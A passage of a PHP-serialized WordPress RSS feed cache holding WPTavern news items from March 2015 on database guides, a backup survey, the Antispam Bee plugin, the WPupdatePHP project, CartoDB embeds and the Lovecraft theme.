Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"WPTavern: Delicious Brains Publishes In-depth Guides on The WordPress Database\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40388\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"http://wptavern.com/delicious-brains-publishes-in-depth-guides-on-the-wordpress-database\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1896:\"<p><a title=\"https://deliciousbrains.com/\" href=\"https://deliciousbrains.com/\">Delicious Brains</a>, the creators of <a title=\"https://wordpress.org/plugins/wp-migrate-db/\" href=\"https://wordpress.org/plugins/wp-migrate-db/\">WP Migrate DB</a>, <a title=\"https://deliciousbrains.com/tour-wordpress-database/\" href=\"https://deliciousbrains.com/tour-wordpress-database/\">published a guide</a> that walks developers through the WordPress database. The guide describes every database table and there associated columns within WordPress single site. It also features an <a title=\"http://codex.wordpress.org/Database_Description#Database_Diagram\" href=\"http://codex.wordpress.org/Database_Description#Database_Diagram\">entity relationship diagram</a> that explains the relationships between the various tables. Although the image was created for WordPress 3.8, it’s still accurate.</p>\n<p>For those who want to learn the database structure of WordPress Multisite, check out their <a title=\"https://deliciousbrains.com/wordpress-multisite-database-tour/\" href=\"https://deliciousbrains.com/wordpress-multisite-database-tour/\">Multisite database tour</a> as there are some key database changes to take note of:</p>\n<blockquote><p>When a WordPress site is <a href=\"http://codex.wordpress.org/Create_A_Network\">converted to a Multisite install</a>, a “network” of subsites is created. The existing site is converted to the first subsite in the network. The database classes the network itself as a site (wp_site), and each subsite as a blog (wp_blogs).</p>\n<p>Certain tables are used only by a subsite, and a new set of tables are created every time a site is added to the network. Each set of tables is differentiated by the blog_id for the subsite used in the table prefix. e.g. `wp_2_posts`.</p></blockquote>\n<p>I encourage you to bookmark both guides as they’re excellent resources.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 10 Mar 2015 21:58:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:116:\"WPTavern: CodeGuard Survey Shows More Education is Needed on Backup Software, Services, and Strategies For WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40341\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:124:\"http://wptavern.com/codeguard-survey-shows-more-education-is-needed-on-backup-software-services-and-strategies-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4426:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/CodeGuardSurveyResultsFeaturedImage.png\" rel=\"prettyphoto[40341]\"><img class=\"aligncenter size-large wp-image-40382\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/CodeGuardSurveyResultsFeaturedImage.png?resize=500%2C187\" alt=\"CodeGuard Survey Results Featured Image\" /></a></p>\n<p><a title=\"https://www.codeguard.com/\" href=\"https://www.codeguard.com/\">CodeGuard</a>, a service that specializes in automated backups to the cloud, has published the results of its 2015 WordPress survey. The survey took place between February 18th-20th and was answered by 503 WordPress users. Backing up is an important part of maintaining a website, so it’s a bit shocking to see such high percentages of people who either don’t backup on a regular basis or who don’t think backup plans are important.</p>\n<p>Out of 503 respondents:</p>\n<ul>\n<li>25% have received “very little training” in the use of WordPress</li>\n<li>22% haven’t been trained at all in WordPress backup and have “no idea” how to do it</li>\n<li>21% have seen the “white screen of death” multiple times, and “it’s horrible!”</li>\n<li>69% have had a plugin fail after an update, and 24% have had it happen “many times”</li>\n<li>63% have deleted files that were not backed up</li>\n<li>22% said that a backup plugin seems “unimportant” to them</li>\n<li>24% said “This site is my livelihood, I’d pay almost anything for a complete restore,” while 19% said they’d be willing to spend several thousand dollars, at least</li>\n</ul>\n<p>I’m surprised to see only 24% of respondents use a backup plugin at all considering there’s so many <a title=\"https://wordpress.org/plugins/search.php?q=backup\" href=\"https://wordpress.org/plugins/search.php?q=backup\">free options available</a>. There appears to be a correlation between those who have little to no WordPress training and the lack of education on how to establish a backup plan. I realize 503 WordPress users is not a large sample size, but the numbers indicate more education is needed on backup software, services, and strategies.</p>\n<p>It’s also alarming to see 69% of respondents have had a plugin fail after an update and 24% of those have had it happen several times. This is further proof that WordPress is <a title=\"http://wptavern.com/its-time-for-wordpress-to-automatically-update-themes-plugins-and-core-by-default\" href=\"http://wptavern.com/its-time-for-wordpress-to-automatically-update-themes-plugins-and-core-by-default\">not ready to automatically update plugins</a> by default.</p>\n<p>An important data point missing from the survey is how many of the respondents rely on automatic backups provided by their webhost. Not every user needs a plugin to manage backups and for a number of managed WordPress hosting companies, automatic backups are part of the package. In fact, most managed WordPress hosting providers discourage and disallow backup plugins from being used. An <a title=\"http://wpengine.com/support/disallowed-plugins/\" href=\"http://wpengine.com/support/disallowed-plugins/\">example is WP Engine</a>:</p>\n<blockquote><p>In general, however, we discourage the use of backup plugins. They needlessly duplicate our built-in functionality, rely on a large amount of local storage and can store files in an insecure manner. Not only that, many of these plugins run their backup jobs at inopportune times. This can slow database connectivity with extra — and sometimes very large — MySQL queries and cause timeouts on larger sites.</p></blockquote>\n<p>This infographic provided by CodeGuard visually shows the survey’s results. When browsing, I suggest replacing <em>WordPress users</em> with <em>respondents</em> as WordPress users sounds too broad. After reviewing the data, let me know if the results surprise you or if it corresponds to what you’re experiencing with clients.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/CodeGuardInfographic.png\" rel=\"prettyphoto[40341]\"><img class=\"wp-image-40371 size-full\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/CodeGuardInfographic.png?resize=1025%2C4879\" alt=\"CodeGuard Infographic Showing Survey Results\" /></a>CodeGuard Infographic Showing Survey Results\n<p> </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 10 Mar 2015 19:49:12 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"WPTavern: WordPress Antispam Bee Plugin Adds Option to Trust Commenters with a Gravatar\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40344\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"http://wptavern.com/wordpress-antispam-bee-plugin-adds-option-to-trust-commenters-with-a-gravatar\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4082:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/bee.jpg\" rel=\"prettyphoto[40344]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/bee.jpg?resize=1025%2C467\" alt=\"photo credit: Osmia pumila, M, Face, MD_2013-06-25.18.39.16 ZS PMax - (license)\" class=\"size-full wp-image-40353\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/54563451@N08/9302552275\">Osmia pumila, M, Face, MD_2013-06-25.18.39.16 ZS PMax</a> – <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>Version 2.6.5 of the popular <a href=\"https://wordpress.org/plugins/antispam-bee/\" target=\"_blank\">Antispam Bee</a> plugin is out today with a new feature that allows administrators to trust commenters with a <a href=\"https://en.gravatar.com/\" target=\"_blank\">Gravatar</a>. The idea for the function was suggested by Caspar Hübinger, a long-time user of the plugin.</p>\n<p>“Have you ever seen a spam comment with a Gravatar image? I haven’t,” Hübinger said in a <a href=\"http://glueckpress.com/6500/trust-the-gravatar/\" target=\"_blank\">post</a> introducing the new feature. “So I suggested to include an option in Antispam Bee to trust commenters with a Gravatar by default, and Sergej, creator of Antispam Bee, was kind enough to implement it.”</p>\n<p>Although the plugin was mentioned by Matt Mullenweg during his Q&A at WordCamp Europe 2014, English speakers have largely overlooked it in the past. Antispam Bee was created by German WordPress plugin developer <a href=\"http://wpcoder.de/\" target=\"_blank\">Sergej Müller</a> and its description page on WordPress.org is written in German. He has actively developed and maintained the plugin since 2009. It is currently used on 200,000+ installations of WordPress.</p>\n<p>One might think that it would make sense to include an English copy of the description to gain a larger user base, but Müller elected to keep it in German due to the plugin’s incompatibilities. Antispam Bee is incompatible with many of the major commenting systems used by English speakers, including Disqus, Jetpack Comments, and AJAX Comment Form.</p>\n<p>English speakers who use <a href=\"http://jetpack.me/support/comments/\" target=\"_blank\">Jetpack Comments</a> often use <a href=\"http://akismet.com/\" target=\"_blank\">Akismet</a>, since the two work together seamlessly. Akismet is far more well-known, since it comes packaged with WordPress by default. However, Antispam Bee has a solid set of features that make it a decent alternative:</p>\n<ul>\n<li>Ad-free</li>\n<li>No storage of personal data</li>\n<li>No registration required</li>\n<li>Free for commercial projects</li>\n<li>No adjustment required by theme templates</li>\n<li>All functions can be controlled by the user</li>\n<li>Statistics for the last 30 days displayed as a dashboard widget</li>\n<li>Supports six languages: German, English, French, Russian, Dutch, and Slovenian</li>\n</ul>\n<p>The plugin also comes with 20 configurable options for customizing its spam-blocking features, including the ability to disable spam email notifications, block comments from certain countries, allow comments only in certain languages, delete after X days, and much more. These options allow you to tailor your anti-spam shield to lessen your moderation load.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/antispam-bee.jpg\" rel=\"prettyphoto[40344]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/antispam-bee.jpg?resize=1025%2C714\" alt=\"antispam-bee\" class=\"aligncenter size-full wp-image-40377\" /></a></p>\n<p>If you’re intrigued by <a href=\"https://wordpress.org/plugins/antispam-bee/\" target=\"_blank\">Antispam Bee</a>‘s latest feature that allows you to trust commenters who have a Gravatar, give the plugin a try the next time you’re reviewing spam-blocking solutions. The option is a creative use of WordPress’ built-in support for Gravatar. Current users of the plugin can find the new setting in the admin under <strong>Settings > Antispam Bee</strong>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 10 Mar 2015 19:06:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"WPTavern: WPupdatePHP Project Aims to Help WordPress Users Get on Newer Versions of PHP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40303\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"http://wptavern.com/wpupdatephp-project-aims-to-help-wordpress-users-get-on-newer-versions-of-php\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4470:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/php.jpg\" rel=\"prettyphoto[40303]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/php.jpg?resize=700%2C329\" alt=\"photo credit: Feediza.com\" class=\"size-full wp-image-40331\" /></a>photo credit: <a href=\"http://feediza.com/\">Feediza.com</a>\n<p>Developers are anxious for WordPress to bump up the minimum PHP requirement for core, as it’s currently lingering at 5.2, which is no longer among the <a href=\"http://php.net/supported-versions.php\" target=\"_blank\">supported versions of PHP</a>. As of August 2014, PHP 5.3 no longer receives patches for security vulnerabilities.</p>\n<p><a href=\"http://wptavern.com/wordpress-version-stats-updated-more-than-13-of-sites-are-running-wordpress-4-1\" target=\"_blank\">Recent updates to WordPress.org stats</a> indicate that 16.4% of WordPress sites are still running on PHP 5.2 and 38% on PHP 5.3. According to lead developer Andrew Nacin, bumping the minimum required version is not likely to happen soon, due to the sheer number of sites that would be negatively impacted.</p>\n<p>“One-sixth of all sites running PHP 5.2 is still many millions of sites,” he said. “If we move the PHP minimum version too early, we risk stranding millions of installs on older versions of WordPress.” In the meantime, the WordPress project is researching the current state of PHP offerings available at popular hosts and will soon be urging them to update to more recent versions.</p>\n<p>WordPress developer <a href=\"http://coenjacobs.me/\" target=\"_blank\">Coen Jacobs</a> believes that the effort to contact hosts will not be enough to help everyone. His new <a href=\"http://www.wpupdatephp.com/\" target=\"_blank\">WPupdatePHP</a> project was created to educate end users on outdated versions of PHP. The <a href=\"https://github.com/WPupdatePHP/wp-update-php\" target=\"_blank\">WPupdatePHP library</a> is a tool that developers can bundle into their plugins in order to require users to upgrade to PHP 5.4+ hosting. It is intended for use within new plugins, not for locking users out of existing ones.</p>\n<p>If a user does not meet the minimum PHP version requirements when installing the plugin, he will be presented with an admin notice:</p>\n<blockquote><p>Unfortunately, this plugin can not run on PHP versions older than [ specified version ]. Read more information about <a href=\"http://www.wpupdatephp.com/update/\">how you can update</a>.</p></blockquote>\n<p>The idea of the WPupdatePHP project is to enlist end users in putting pressure on hosts to <a href=\"http://www.wpupdatephp.com/update/\" target=\"_blank\">update their versions of PHP</a>. A future version of the library would add the ability for developers to make the PHP version a “soft requirement,” which would still display the notice but won’t stop the user from using the plugin.</p>\n<p>“The core WordPress team can’t get every single hosting company to comply,” Jacobs said in a recent post titled <em><a href=\"http://coenjacobs.me/updating-php-everyones-responsibility/\" target=\"_blank\">Updating PHP is Everyone’s Responsibility</a></em>. “I admire their intentions, but in reality this is not going to help everybody.”</p>\n<p>He predicts a need for the WPupdatePHP library even after WordPress bumps its minimum required PHP version. “PHP 5.4 is actually already nearing its EOL date and we’re still figuring out how to make PHP 5.2 and 5.3 platforms go away,” he said. In mid-September 2015, PHP 5.4 will not longer receive security fixes.</p>\n<p>Jacobs believes that the changes that need to happen require more than a one-time campaign where the WordPress project successfully badgers hosts to update to PHP 5.4.</p>\n<p>“In six months we’ll have this same issue all over again,” he said. “As soon as webhosting companies have finally finished off their PHP 5.2 and 5.3 environments, we can start this whole campaign all over again to get rid of PHP 5.4. And so on.”</p>\n<p>If you are a WordPress developer interested in enlisting your plugin’s users to help push hosts to update PHP versions, check out <a href=\"https://github.com/WPupdatePHP/wp-update-php\" target=\"_blank\">WPupdatePHP on GitHub</a>.</p>\n<p>“The end user is one of our most important, but underestimated, assets in this battle,” Jacobs said. “They have the strongest voice in this all.”</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Mar 2015 22:24:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"WPTavern: WordPress.com Adds oEmbed Support For CartoDB Maps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40265\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://wptavern.com/wordpress-com-adds-oembed-support-for-cartodb-maps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1371:\"<p>WordPress.com <a title=\"https://en.support.wordpress.com/cartodb-embeds/\" href=\"https://en.support.wordpress.com/cartodb-embeds/\">now supports oEmbeds</a> for<a title=\"http://cartodb.com/\" href=\"http://cartodb.com/\"> CartoDB,</a> a tool used to create and share interactive maps. Simply copy and paste a CartoDB map URL into the WordPress.com post editor and a live preview will display. Here’s an example of a map using the standard HTML embed code.</p>\n<p></p>\n<p>According to an announcement on the <a title=\"http://blog.cartodb.com/wordpress/\" href=\"http://blog.cartodb.com/wordpress/\">official CartoDB blog</a>, embed support has also been added to Jetpack. However, I discovered after testing that it’s not yet supported. I reached out to Jetpack’s development team to find out when it will be added, but they’re <a title=\"https://wordpress.org/support/topic/jetpack-staff-will-be-unavailable-until-march-16th\" href=\"https://wordpress.org/support/topic/jetpack-staff-will-be-unavailable-until-march-16th\">not available</a> until March 16th.</p>\n<p>With more than 60 million users, CartoDB has an incredible opportunity to expand its reach by being accessible on a platform where over <a title=\"https://wordpress.com/activity/\" href=\"https://wordpress.com/activity/\">409 million people</a> view more than 17.6 billion pages each month.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Mar 2015 20:13:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"WPTavern: Lovecraft: New Free WordPress Theme Combines Prominent Imagery with Strong Serif Fonts\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40251\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"http://wptavern.com/lovecraft-new-free-wordpress-theme-combines-prominent-imagery-with-strong-serif-fonts\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3402:\"<p>WordPress theme author <a href=\"http://www.andersnoren.se/\" target=\"_blank\">Anders Norén</a> is back to releasing themes after a brief hiatus over the winder holidays. <a href=\"https://wordpress.org/themes/lovecraft/\" target=\"_blank\">Lovecraft</a>, is his 10th theme to be approved on WordPress.org.</p>\n<p>The Lovecraft design was inspired by the work of <a href=\"http://en.wikipedia.org/wiki/H._P._Lovecraft\" target=\"_blank\">H.P. Lovecraft</a>, an American horror fiction author known for his “weird realism” – the idea that reality is fundamentally weird and the human mind is incapable of realistically representing it.</p>\n<p>Norén’s tribute to Lovecraft’s work is conveyed most clearly through the serif-heavy typography of the theme and a strong focus on the imagery assigned to each post. He selected Google Font’s <a href=\"http://www.google.com/fonts/specimen/Playfair+Display\" target=\"_blank\">Playfair Display</a> for page and post headers, accompanied by Georgia for the body text. The bright red links and red post meta complement the design’s literary theme.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/lovecraft.png\" rel=\"prettyphoto[40251]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/lovecraft.png?resize=880%2C660\" alt=\"lovecraft\" class=\"aligncenter size-full wp-image-40267\" /></a></p>\n<p>The homepage showcases a full-width header image and each post replaces that image with its own featured image. These images, along with the rest of the theme, gracefully scale down for smaller devices.</p>\n<p>Lovecraft, like many other recently released themes, adds additional features by offering support for <a href=\"http://jetpack.me/\" target=\"_blank\">Jetpack</a>, including the infinite scroll module and styles for tiled galleries.</p>\n<p>Norén took every small detail into consideration when creating Lovecraft, as you can see with the blockquotes design, ordered lists, post media, and form styles on the <a href=\"http://andersnoren.se/themes/lovecraft/style-guide/\" target=\"_blank\">Style Guide</a> page.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/lovecraft-blockquote.jpg\" rel=\"prettyphoto[40251]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/lovecraft-blockquote.jpg?resize=617%2C217\" alt=\"lovecraft-blockquote\" class=\"aligncenter size-full wp-image-40283\" /></a></p>\n<p>The theme allows you to select the accent color via the customizer. It also includes support for a custom logo, editor styles, and matching widgets for Flicker, recent posts, and recent comments with thumbnails. Pages have an additional template for full-width display. Check out the <a href=\"http://andersnoren.se/themes/lovecraft/\" target=\"_blank\">live demo</a> to see Lovecraft in action.</p>\n<p>If you’re looking for a bold new theme for your blog and you appreciate strong serif fonts, Lovecraft is a thoughtfully-designed option. The theme is <a href=\"http://www.wordpress.org/themes/lovecraft\" target=\"_blank\">available for free</a> in the WordPress Theme Directory as of today. For more information on how Anders Norén finds continual inspiration for his free themes, check out our recent <a href=\"http://wptavern.com/a-chat-with-anders-noren-on-finding-inspiration-for-wordpress-theme-design\" target=\"_blank\">interview</a> with the designer.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Mar 2015 18:54:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Matt: NNT of Medicine\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44289\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"http://ma.tt/2015/03/ntt-of-medicine/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:643:\"<p><a href=\"http://www.wired.com/2014/10/number-needed-to-treat/\">This Man’s Simple System Could Transform American Medicine</a>, about a quest to quantify the effects of medicine and treatment differently, which is really needed.</p>\n<p>Update: Looks like it’s built on WordPress, too:</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>.<a href=\"https://twitter.com/photomatt\">@photomatt</a> Thanks for the link! I built the site with Dave Newman (powered by WordPress)!</p>\n<p>— Graham Walker (@grahamwalker) <a href=\"https://twitter.com/grahamwalker/status/575069240140656641\">March 9, 